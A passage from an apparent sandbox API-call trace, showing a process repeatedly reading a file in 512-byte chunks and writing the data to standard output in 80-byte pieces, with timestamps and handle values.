(_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.872] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.872] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.873] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.873] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.874] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.874] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.875] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.875] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.875] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.875] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.876] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.876] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] GetFileType (hFile=0x4c) returned 0x1 [0234.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.876] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] GetFileType (hFile=0x4c) returned 0x1 [0234.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.877] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.877] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.878] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.878] GetFileType (hFile=0x4c) returned 0x1 [0234.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.879] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, 